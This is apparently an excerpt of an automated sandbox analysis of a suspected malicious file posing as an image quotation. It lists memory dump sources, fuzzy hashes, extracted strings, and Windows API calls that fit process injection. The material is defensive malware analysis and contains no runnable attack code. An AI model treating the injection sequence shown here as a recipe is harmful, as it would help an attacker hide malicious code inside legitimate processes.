                          • Instruction Fuzzy Hash: AB42D4B4E1621DCFDB19DFA4D448ABEBBB2FB89310F10801AD912AB754CB345982DF51

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: Pleq$$eq
                          • API String ID: 0-256856317
                          • Opcode ID: 0961b2158dc24ed40e4180ea876a1d5cfe326fca374ea5fbf040540ffd94ea45
                          • Instruction ID: 2cfbe15912dd5a8ed5c447ef5bfcc86af38bb8e636df1c2293a1c2760b027653
                          • Opcode Fuzzy Hash: 0961b2158dc24ed40e4180ea876a1d5cfe326fca374ea5fbf040540ffd94ea45
                          • Instruction Fuzzy Hash: 40122774B002058FDB54EF29C994A6AB7F2FF89319F2584A9E505CB3A1DB31EC41CB51

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2109782239.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_56e0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq$4'eq
                          • API String ID: 0-907361030
                          • Opcode ID: 5924643c860a0ce14e4bd362e826634c70329536a57d474714c81f71795b169f
                          • Instruction ID: d375719a8ebdfcbac46f9e3af0041af34820b8350c14dc035b0eab5b25125ec1
                          • Opcode Fuzzy Hash: 5924643c860a0ce14e4bd362e826634c70329536a57d474714c81f71795b169f
                          • Instruction Fuzzy Hash: 83F1B674D06218DFCB64DFA4E5986ACBBB2FF8A311F20412AE416B7394DB355986CF10

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq$Hiq
                          • API String ID: 0-2459830773
                          • Opcode ID: a18f528e1749fbcde83c64cf87bddcec4cb6be0c1a1ccbeef30ef131d11eef95
                          • Instruction ID: 05c71f313e3bb7c2ecd688b46f1839b8ce256273a0a803f4c4d8f239777c8b21
                          • Opcode Fuzzy Hash: a18f528e1749fbcde83c64cf87bddcec4cb6be0c1a1ccbeef30ef131d11eef95
                          • Instruction Fuzzy Hash: 0451BB30B002158FDBA9AF78C85462E7BB6BF89310B2045ADD9068B3A0CF35DD06CB91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq$Hiq
                          • API String ID: 0-2459830773
                          • Opcode ID: 7fec0c743a8842bf36b21bd24b52e961a024129b8018db7d11699891199ffe51
                          • Instruction ID: efe0bcf25b8ceca3cc8b01ac7fedfbcb7655e91cd91a25e3bd60be4872db6840
                          • Opcode Fuzzy Hash: 7fec0c743a8842bf36b21bd24b52e961a024129b8018db7d11699891199ffe51
                          • Instruction Fuzzy Hash: 4451E230B042119FD755DB28C91496E7BE6EF89210B1580AAE505CB3E2DB35DC06CBA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq$Hiq
                          • API String ID: 0-2459830773
                          • Opcode ID: 5959c9bf3c5d3a16a2034d1981c8ae444fa7199d2d78ec2521476537d45b8bcb
                          • Instruction ID: 757573064fda4d51b4000e03d3f79905d9f1a8057709ff44fbf08c3c9b2ee30f
                          • Opcode Fuzzy Hash: 5959c9bf3c5d3a16a2034d1981c8ae444fa7199d2d78ec2521476537d45b8bcb
                          • Instruction Fuzzy Hash: 904112706007508FD7A1EF39D44039B7BE6FF84314F148A6DE45A8B695DB34E945CBA0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: $vW+`
                          • API String ID: 0-2655680021
                          • Opcode ID: b8534cb55b3297f7b69c8ca66e71b873d7b66bd95024f826937eb2fb0e134582
                          • Instruction ID: 391023809baf8fc263538f5483786148861c532e3b67540fcef759c11fcecd76
                          • Opcode Fuzzy Hash: b8534cb55b3297f7b69c8ca66e71b873d7b66bd95024f826937eb2fb0e134582
                          • Instruction Fuzzy Hash: FD416A71F0011A8FCB10CFA9D8805AFF7B2FB84626B55C52AE614DB719D730E9628BD1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: #$%
                          • API String ID: 0-2141590602
                          • Opcode ID: ce07073c576c9b942a9b051e8875ef46cdbcad6721d45e122b3c836c50e64394
                          • Instruction ID: c4b141d8a4d72ee4abc82627d0d26d3832322e7aeb758a072de04f347bcaa728
                          • Opcode Fuzzy Hash: ce07073c576c9b942a9b051e8875ef46cdbcad6721d45e122b3c836c50e64394
                          • Instruction Fuzzy Hash: F5111B34A00205DFDB44CF68E599AAD77F5FF49304F504669D406AB294DBB49D85CF40
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: a$l
                          • API String ID: 0-62436560
                          • Opcode ID: 0d89348e53dd4680107a743d10b4d630d21557579f3e8e6f97413f28c9b3b46d
                          • Instruction ID: 181562495cb6ddccaa4ae18f739dfb9a519e30a0a9e4d08baebd8fda2951219f
                          • Opcode Fuzzy Hash: 0d89348e53dd4680107a743d10b4d630d21557579f3e8e6f97413f28c9b3b46d
                          • Instruction Fuzzy Hash: 8511B074A102298FCBA4EF58D884BADB7B1FB48209F1045E4E419A3340DB399EC8CF51
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: (_eq
                          • API String ID: 0-480964360
                          • Opcode ID: 1c091413d4b1082f82491c11ffb4d739b0871ac25ebff1523305a8957b64a982
                          • Instruction ID: baf9b9278d80f3da9b010853b4ded8441f2c6287edec70b4096a70f2adb92d8f
                          • Opcode Fuzzy Hash: 1c091413d4b1082f82491c11ffb4d739b0871ac25ebff1523305a8957b64a982
                          • Instruction Fuzzy Hash: BD229C35B002159FDB44DFA8D894AADB7B2FF88304F1484A9E905EB3A5DB75EC44CB90
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 064F2007
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 27913da9b665cc2309d5a7d78ec3217310be3ad0d1868240a9f946cead0185da
                          • Instruction ID: cac9f56b0cca90038169071e231f4b5027fa919dff98e22e3bebb6e22a37b136
                          • Opcode Fuzzy Hash: 27913da9b665cc2309d5a7d78ec3217310be3ad0d1868240a9f946cead0185da
                          • Instruction Fuzzy Hash: 07A11371D10218CFDB60CFA9C885BEEBBF1FB09310F14916AE958A7240DBB48985CF95
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 064F2007
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 0919ed7b6fc0323b63727fcd3880473dc38e618a49db0fd9259fb42bdbbccb35
                          • Instruction ID: f8e02454395455f9fd34a2b8e8ab06666f91e8bb18605f826f9a21ff5b4f8c49
                          • Opcode Fuzzy Hash: 0919ed7b6fc0323b63727fcd3880473dc38e618a49db0fd9259fb42bdbbccb35
                          • Instruction Fuzzy Hash: 5CA11371D10219CFDB60CFA9C885BEEBBF2BF09310F14916AE958A7250DBB48985CF51
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5dc347299d5dbeaaf51435b086974ae70012a51df389d1f55f8a92dd02ea794d
                          • Instruction ID: 672a7f525702b5759ef6b6f1418b74eacf3b60d6d63bdfc12e9e36fecce8b7ec
                          • Opcode Fuzzy Hash: 5dc347299d5dbeaaf51435b086974ae70012a51df389d1f55f8a92dd02ea794d
                          • Instruction Fuzzy Hash: 4E414371D152489FCB50DFE9D884AEEBFF0EF4A310F14802AE419BB251C779A945CB64
                          APIs
                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 064F28EB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: c15fbb0fbc8fb7366b26699f37e4e0c920d8044f8ae7a8f81c9ac3355ec064c5
                          • Instruction ID: 070c5d824c38419ae9ef368e09376bad27c8cf1548430422a28f458cead5e75f
                          • Opcode Fuzzy Hash: c15fbb0fbc8fb7366b26699f37e4e0c920d8044f8ae7a8f81c9ac3355ec064c5
                          • Instruction Fuzzy Hash: 8E41A8B5D012589FCF00CFA9D984AEEBBF1FB49310F24942AE818B7210D775AA45CB64
                          APIs
                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 064F28EB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          APIs
                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 064F2762
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 064F2DAC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          APIs
                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 064F2762
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 064F2DAC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 064F2207
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          APIs
                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 065CDB74
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112388205.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_65c0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 064F2207
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          APIs
                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 065CED37
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112388205.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_65c0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2109782239.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_56e0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq
                          • API String ID: 0-1552367303
                          • Opcode ID: c9bd5521a47ccaf223024bc53b1295b720547f7c4f5daba9114e05afe7bc9954
                          • Instruction ID: 79b06626713258a4e1062d90a2fcbb6def9236135c7707ea304ccf5428af4681
                          • Opcode Fuzzy Hash: c9bd5521a47ccaf223024bc53b1295b720547f7c4f5daba9114e05afe7bc9954
                          • Instruction Fuzzy Hash: 12314974D06219CFDB18CFA9D848AFEBBB2FF45311F10806AD412AB290C7745A4ACF91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: <d|q
                          • API String ID: 0-1894747305
                          • Opcode ID: 2de5f38e75ee9e678878e6946a884bd4784e478fc5a7db6a2015f138be30ad17
                          • Instruction ID: 926f2d725d296da540ad449d75cabc936db20f2db8174918b690d7624df97f9a
                          • Opcode Fuzzy Hash: 2de5f38e75ee9e678878e6946a884bd4784e478fc5a7db6a2015f138be30ad17
                          • Instruction Fuzzy Hash: DC31A071A00619CFDB04CFA8C585AADBBF2BF48310F298596E509EB265D735ED81CB90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: \seq
                          • API String ID: 0-3382732615
                          • Opcode ID: d7d82bf20a51408e1368f64e24e11e1512a8f97cafa843f2238e8568a292f340
                          • Instruction ID: 5e9749f62fb68a97565daaa8bf0f0a188b8acc4611ae58d27c70cf0dce25aa99
                          • Opcode Fuzzy Hash: d7d82bf20a51408e1368f64e24e11e1512a8f97cafa843f2238e8568a292f340
                          • Instruction Fuzzy Hash: 4221AE323101208FC755DBBDD85492A7BF9EF89A5431684AAF20ACB376DB21DC018B90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: p<eq
                          • API String ID: 0-1484963132
                          • Opcode ID: 9d5ef1222ed03b30886539528d02abeb3a98007624ac75a6504a98f5e586a468
                          • Instruction ID: 792cd00dca58bf616b2b343c85faf8ecdb5bcfbed28975743b3d0519d628b11d
                          • Opcode Fuzzy Hash: 9d5ef1222ed03b30886539528d02abeb3a98007624ac75a6504a98f5e586a468
                          • Instruction Fuzzy Hash: 0C216231704294AFDB56DF6AC850EAA7BE5BF8A244B098096FC55CB371C635EC50CB60
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: Q
                          • API String ID: 0-3463352047
                          • Opcode ID: 2cb3e0f1036bcd83918a3b1ad499247c5b4dba12bd579b6455774026c87dc797
                          • Instruction ID: b9d264e072e121c25aa29c513d5a5175150997659dba2b9f523d5634d510c9df
                          • Opcode Fuzzy Hash: 2cb3e0f1036bcd83918a3b1ad499247c5b4dba12bd579b6455774026c87dc797
                          • Instruction Fuzzy Hash: A8014C74E112288FDBA6DF18D844799BBF9BB49315F1090E9A54EA2240DBB05FC4CF01
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: }q&1
                          • API String ID: 0-2132944420
                          • Opcode ID: f365a80d69187d98a1803c7d725f8cc6e6b4af74f11161a86e8b9222ec7d9ee5
                          • Instruction ID: 6e949f80027134649016b20feed92e93b118a9f0ae434dbbf763878d3dda4129
                          • Opcode Fuzzy Hash: f365a80d69187d98a1803c7d725f8cc6e6b4af74f11161a86e8b9222ec7d9ee5
                          • Instruction Fuzzy Hash: C80131347003149FE794DF28E955B6973B6FF8A300F5086A5D40A9B354DB749D85CF41
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: #
                          • API String ID: 0-1885708031
                          • Opcode ID: f786cb328b01dd3e7daab04af4ba91311cae3269274fb6607783c32b2d8a9a14
                          • Instruction ID: a755d528f0c06726ac56004a5473795bc0a5add0593caee90da16b1af6fec274
                          • Opcode Fuzzy Hash: f786cb328b01dd3e7daab04af4ba91311cae3269274fb6607783c32b2d8a9a14
                          • Instruction Fuzzy Hash: 8EF04930B01208AFDB84DF68E599AAD77F6FF49300F904539E016AB654DBB46C41CF00
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: Teeq
                          • API String ID: 0-348098666
                          • Opcode ID: 0f35ca885737afc980da7a68dc415f63457a3b97a207d99c96dbec112e4e2053
                          • Instruction ID: f617aed24561f708b308c8973d9657cb34c0d883d3d09cf3aaed62d211183906
                          • Opcode Fuzzy Hash: 0f35ca885737afc980da7a68dc415f63457a3b97a207d99c96dbec112e4e2053
                          • Instruction Fuzzy Hash: 5CF0F8B4A5122A8FCBA4DF28D884BEEB7B1FB49314F1081E9941DA7754DA301E84DF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: >
                          • API String ID: 0-325317158
                          • Opcode ID: 4da72f628b79501f1b0c231acc635459c3f063eef6d229430d7b751a1ebc195b
                          • Instruction ID: 9705fad6387655ca4abe98028f977dfd117d5c585a181951f3c7886ee5e44a08
                          • Opcode Fuzzy Hash: 4da72f628b79501f1b0c231acc635459c3f063eef6d229430d7b751a1ebc195b
                          • Instruction Fuzzy Hash: 55D05B706066188FDB90EF68D488D9D77B9FB44304F204995D40697245EB755DC5CF40
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: >
                          • API String ID: 0-325317158
                          • Opcode ID: 3e5cd0ff75cd3cac19c9ec35a30233b2ea8cfa51a68fbf6b1d7febfe3f273fa4
                          • Instruction ID: 9705fad6387655ca4abe98028f977dfd117d5c585a181951f3c7886ee5e44a08
                          • Opcode Fuzzy Hash: 3e5cd0ff75cd3cac19c9ec35a30233b2ea8cfa51a68fbf6b1d7febfe3f273fa4
                          • Instruction Fuzzy Hash: 55D05B706066188FDB90EF68D488D9D77B9FB44304F204995D40697245EB755DC5CF40
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111378217.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: true
                          • Associated: 00000000.00000002.2111165061.0000000006380000.00000004.08000000.00040000.00000000.sdmp
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 02f23fc6d385a3aa399d6b594730c070095cdcfa644195e54c4fc94dd8a6fbdb
                          • Instruction ID: 03125a88ff57865ba2ce287ae0dfa07d2672415831cb11ab303b67f715b9e829
                          • Opcode Fuzzy Hash: 02f23fc6d385a3aa399d6b594730c070095cdcfa644195e54c4fc94dd8a6fbdb
                          • Instruction Fuzzy Hash: BB31C275E012099FDB44CF99D484AEEBBF2FF88310F10912AE915AB364DB70A940CF90
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cc80646266301aa94616677a2be52fc7717cf2cf9f6390aaddf7da717783ca48
                          • Instruction ID: 94703f99c327b705bc0e2d3570cf0324c5a45c80bc01b7783dfe16574b9030b2
                          • Opcode Fuzzy Hash: cc80646266301aa94616677a2be52fc7717cf2cf9f6390aaddf7da717783ca48
                          • Instruction Fuzzy Hash: 0D219434F10A19CFCB44EF68D5448AEB7B6FF89700B50412AD516A7364EF34AA46CBE1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 43c7695f20dcad56549561e90a746630996aa2732c6188f7f60d87685229c17e
                          • Instruction ID: c7cb6fdbd88d9ae41b3673c407dfb1def600e350436cbd5caeb2669c995a7508
                          • Opcode Fuzzy Hash: 43c7695f20dcad56549561e90a746630996aa2732c6188f7f60d87685229c17e
                          • Instruction Fuzzy Hash: 4521D634A006198FDB44EF68D9448AEB7B5FF89300F00416AE5159B3A4EB30AE06CFE1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9228d44e05efe9d017a9b27eecad99915a0786a3c0a1806c834ab06caea5c69e
                          • Instruction ID: 034781e30f9feae193892a4d767ed96194bdef5f3f6a72a50ae9f7da5a60d95a
                          • Opcode Fuzzy Hash: 9228d44e05efe9d017a9b27eecad99915a0786a3c0a1806c834ab06caea5c69e
                          • Instruction Fuzzy Hash: E02128B4E05219DBDB04DFE9D8483EEBBF2FB88310F10842AD515A3368DB7859418B50
                          Memory Dump Source
                          • Source File: 00000000.00000002.2086969556.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_122d000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3e79c78435df817bf1d4932c4421e9255e5478cc6e10cff3501913f1243139bf
                          • Instruction ID: 275ba4703b4421a857ddc88975b8631a674b37b3caa53143b9b054d31e6ed571
                          • Opcode Fuzzy Hash: 3e79c78435df817bf1d4932c4421e9255e5478cc6e10cff3501913f1243139bf
                          • Instruction Fuzzy Hash: 552148B1514248EFDB25DF98E9C0B2ABF65FB88320F24C568E90D0B247C336D415CAA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a4aff9ca6836815054e1812ef619b8fc7474a20cfaf1fe9dd7a86f3fac69e96e
                          • Instruction ID: ab36c7a058be1574e93e8ec460043e4731f90f134e5fcc043c2e975782acb3a8
                          • Opcode Fuzzy Hash: a4aff9ca6836815054e1812ef619b8fc7474a20cfaf1fe9dd7a86f3fac69e96e
                          • Instruction Fuzzy Hash: C1217F31A01218AFDB15DF68C444ADEBBB6FF8D720F244169E911A7390DB319845CB90
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
